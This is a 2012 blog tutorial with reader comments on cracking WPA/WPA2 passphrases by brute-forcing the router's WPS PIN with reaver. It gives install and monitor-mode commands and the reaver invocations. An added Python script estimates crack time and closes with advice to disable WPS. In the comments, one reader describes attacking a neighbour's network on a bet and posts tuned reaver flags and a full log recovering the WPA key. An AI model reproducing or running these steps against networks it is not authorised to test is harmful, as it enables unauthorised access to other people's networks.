Thursday, April 5, 2012

Easily Crack WPA Or WPA2 PSK Under 10 Hours

WPA, and even WPA2, can be cracked in under 10 hours provided that WPS is enabled on the router. The software we'll use is reaver.

The hardware I'm using is an Intel(R) PRO/Wireless 3945ABG/BG on Ubuntu 11.04, with the iwl3945 driver.

First install the libraries needed to compile the software. Run the following command in a terminal to do so:
sudo apt-get install libsqlite3-dev libpcap0.8-dev build-essential
Now, in the terminal, change into the /tmp folder:
cd /tmp
Download reaver by running the command below. The URL must be quoted, because the & characters in it would otherwise be interpreted by the shell:
wget -c 'http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q='
Now extract it by running:
tar xf reaver-1.4.tar.gz
The build files are in the src directory of the extracted tree, so change into it and run the following commands to compile the software:
cd reaver-1.4/src
./configure
make
sudo make install
After this reaver will be installed on your system.
Now let's install aircrack-ng (optional). We won't be using aircrack-ng itself, but its airmon-ng tool makes enabling monitor mode easier. You can install it by running:
sudo apt-get install aircrack-ng
Now comes the attacking part.

First of all we have to enable monitor mode on our wireless interface. To do so run:
sudo airmon-ng start wlan0
This will create a new interface mon0 (ath0 with other drivers) with monitor mode enabled.

You can also put the interface into monitor mode by hand with iwconfig; aircrack-ng is not required in that case.

Now let's check whether the AP supports WPS. Run:
sudo wash -i mon0 --ignore-fcs
If the AP doesn't support WPS it won't be listed here. If it is listed, the AP supports WPS and can be cracked. Note the channel and BSSID of the AP you want.

Now let's run reaver:
sudo reaver -i mon0 -b bssid-you-noted-above -c channel-you-noted-above -vv --no-nacks
Reaver will now start brute forcing the WPS PIN and will recover the WPA/WPA2 PSK in less than 10 hours.
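Added example, not from the original post or from the reaver project: a Python script that parses reaver's progress lines, of the shape quoted in the comments below, into a worst-case time estimate, and shows where the "under 10 hours" figure comes from. WPS acknowledges the PIN in two halves, so the effective search space is 10^4 + 10^3 = 11,000 PINs no matter how strong the WPA passphrase is, which is also why the progress counter jumps to about 91% once the first half is known; the sample line in the block is constructed.

```python
import re
from dataclasses import dataclass

# Effective WPS PIN search space as reaver exploits it. The 8-digit PIN is
# acknowledged in two halves (4 digits, then 3 digits plus a checksum digit),
# so the worst case is 10**4 + 10**3 attempts instead of the 10**7 that an
# 8-digit PIN with a checksum digit would otherwise need.
FIRST_HALF = 10 ** 4
SECOND_HALF = 10 ** 3
TOTAL_PINS = FIRST_HALF + SECOND_HALF  # 11000

# Shape of reaver's periodic status line, e.g.
# "[+] 65.42% complete @ 2012-06-07 14:33:30 (18 seconds/pin)"
PROGRESS_RE = re.compile(
    r"\[\+\] (?P<pct>\d+\.\d+)% complete @ "
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"\((?P<spp>\d+) seconds/pin\)"
)

@dataclass
class Progress:
    percent: float
    timestamp: str
    seconds_per_pin: int

    @property
    def pins_tried(self) -> int:
        return round(self.percent / 100 * TOTAL_PINS)

    @property
    def first_half_found(self) -> bool:
        # Once the first 4 digits are confirmed only the 1000 second-half
        # candidates remain, so progress jumps to at least 10000/11000 ~ 90.9%.
        return self.pins_tried >= FIRST_HALF

    def worst_case_remaining_seconds(self) -> int:
        return (TOTAL_PINS - self.pins_tried) * self.seconds_per_pin

def parse_progress(line: str):
    """Return a Progress for a reaver status line, or None for any other line."""
    m = PROGRESS_RE.search(line)
    return None if m is None else Progress(float(m["pct"]), m["ts"], int(m["spp"]))

def worst_case_hours(seconds_per_pin: float) -> float:
    """Upper bound, in hours, on a full WPS PIN brute force at a given rate."""
    return TOTAL_PINS * seconds_per_pin / 3600

if __name__ == "__main__":  # constructed sample line in the shape of reaver's output
    p = parse_progress("[+] 90.93% complete @ 2012-06-07 14:34:55 (18 seconds/pin)")
    print(p.first_half_found, p.worst_case_remaining_seconds(), worst_case_hours(3))
```

For the defender the number to remember is 11,000: passphrase strength does not enter into it, so the fix is to disable WPS on the AP and then confirm with wash that the AP no longer advertises it.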

36 comments:

  1. hey a similar post I wrote here:
    http://shambool.com/2012/04/08/reaver-on-ubuntu-cracking-wpawpa2-wifi-nets/

  5. I have a question that has been asked on other websites but I have not found an answer.
    I bet my neighbor $100 I could get his password knowing WPS was enabled. The signal strength is low, about -80. I'm at 33% after a few days, no problem it just runs in the background. I was just wondering if Reaver has to reach 100% or is it similar to a WEP crack where it gives the information as soon as it is acquired? Could I possibly get it at 50%?

    Replies
    1. Reaver is also brute-forcing software. It exploits WPS to crack the key in a short time. So no, you don't have to reach 100%. If you're lucky you might get it at 50%. Alternatively you can also manually give it a PIN to try by passing the PIN with -p.

    2. I knew about entering it manually. Thank you for the percentage answer, I figured that was the case but I keep reading on the google source page about people getting to 90-100% so I wasn't sure. I guess we'll see how long it takes when it gets there.
      I'm sitting at 50% now, I found a code to speed it up a bit.

      Thanks again

    3. I've managed to crack it before 100% :D. BTW, how did you speed it up?

    4. Well, I started with reaver -i mon1 -b xx:xx:xx:xx:xx:xx -vv like everyone, which helps understand how Reaver works.
      Then after reading a few posts and going through the codes I tried a few methods to decrease the delay. Here are the two codes that have worked best for me. I went from over 200 sec/pin to under 60 sec/pin.

      reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c1 -d 0 (changes the delay from 1 sec to 0)

      reaver -i mon0 -b xx:xx:xx:xx:xx:xx -w -N -S -l 300 (This has been the best so far; I found this code in another post.)

    5. Did you mean -l 30 as opposed to -l 300 in the above command?

    6. Nope -l 300 worked for me just fine.

      I actually came back because I finished my crack. I hate when people ask questions and don't come back with their solution.

      Using reaver -i mon0 -b xx:xx:xx:xx:xx:xx -w -N -S -l 300 against a router only giving out -84 power, it got down to 15 sec/pin. It made it to 65%, then jumped directly to 90% after it found the first 4 digits. When it finished I was given the WPS key only, then I used the one-pin command to get the password. Here is what my experience looked like.

      [+] 65.42% complete @ 2012-06-07 14:33:30 (18 seconds/pin)
      [+] 65.46% complete @ 2012-06-07 14:33:56 (18 seconds/pin)
      [+] 90.93% complete @ 2012-06-07 14:34:55 (18 seconds/pin)
      [+] 90.96% complete @ 2012-06-07 14:35:19 (18 seconds/pin)
      then
      [+] 97.12% complete @ 2012-06-07 15:51:09 (15 seconds/pin)
      [+] WPS PIN: 'pinxxxxx'
      then I typed:
      reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -T 2 -p (pin)
      which brought me to:
      [+] Sending identity response
      [+] Received M1 message
      [+] Sending M2 message
      [+] Received M3 message
      [+] Sending M4 message
      [+] Received M5 message
      [+] Sending M6 message
      [+] Received M7 message
      [+] Sending WSC NACK
      [+] Sending WSC NACK
      [+] Pin cracked in 103 seconds
      [+] WPS PIN: 'pinxxxxx'
      [+] WPA PSK: 'password'
      [+] AP SSID: 'name of network'
      [+] Nothing done, nothing to save.

    7. Great and congrats. I'll try with -300 today.

    8. For me -30 was 4/5 sec per key while -300 was 9/10 sec per key.

  6. Hey,
    first of all thanks for this guide :)
    I'm sorry to say that it doesn't seem to work for me. Could you take a look and tell me what I am doing wrong?

    [+] Switching mon3 to channel 1
    [+] Waiting for beacon from xxxxxxxx
    [+] Associated with xxxxxxxxxx (ESSID: xxxxxx)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin

    What does that mean?

    would be grateful for every help :)

    Replies
    1. Do you have good signal strength?

    2. Hello, I have been receiving this same message and it keeps looping. I tried all the other reaver options above (including the default and the faster code). My power as stated in airodump is around 50-70. My modem is actually within 10-15 steps, basically very, very near to me. I had WPS enabled but am unable to brute force it? :/

    3. I'm not sure. Sometimes changing the position has helped me. Why don't you try that once?

    4. Okay, it worked (sort of, I guess), but now it has been staying at 99.99% all day, since 6pm.
      [+] 99.99% complete @ 2012-09-26 22:38:09 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:38:47 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:39:27 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:40:01 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:40:43 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:41:21 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:41:50 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:42:37 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:43:24 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:44:17 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:44:47 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:45:18 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:45:49 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:46:58 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:47:47 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:48:38 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:49:29 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:50:09 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:50:52 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:51:46 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:52:34 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:53:04 (24 seconds/pin)
      [+] 99.99% complete @ 2012-09-26 22:53:27 (24 seconds/pin)

      What did I do wrong this time? ><

    5. The same thing happened to me with one AP as well. Either it wouldn't brute force at all or it got stuck at 99.99%. I even tried without resuming, but to no avail.

    6. Alright, I'll try with another AP and come back with results. :)

    7. Still can't get it to work~ :X It either stops at a certain percentage after running for some time, or it won't start at all.

  8. How do I install reaver without internet on BackTrack 5?

    Replies
    1. Since Backtrack is based on Debian, you can get hold of .deb files for Reaver and its dependencies and install offline.

    2. I'm new to BackTrack, but this worked for me. First you download reaver; I used reaver-1.4.tar.gz. Copy the downloaded file to the desktop in a new folder, rename the folder "reaver", and then
      > open a terminal.
      > go to the desktop directory in terminal, by typing cd Desktop
      (hit enter after every command line)

      cd reaver

      tar -zxf reaver-1.4.tar.gz

      cd reaver-1.4

      cd src

      ./configure

      make && make install

    3. Great. Thanks for answering back.

  9. Does Ubuntu 12.04 support this process?

  11. How do I open a terminal? And what's that?

    Replies
    1. If you are using Windows, open the command prompt.

  13. Please, command-line steps on how to install on Windows.

    Replies
    1. Download reaver binary for Windows. Rest of the instructions should be the same.
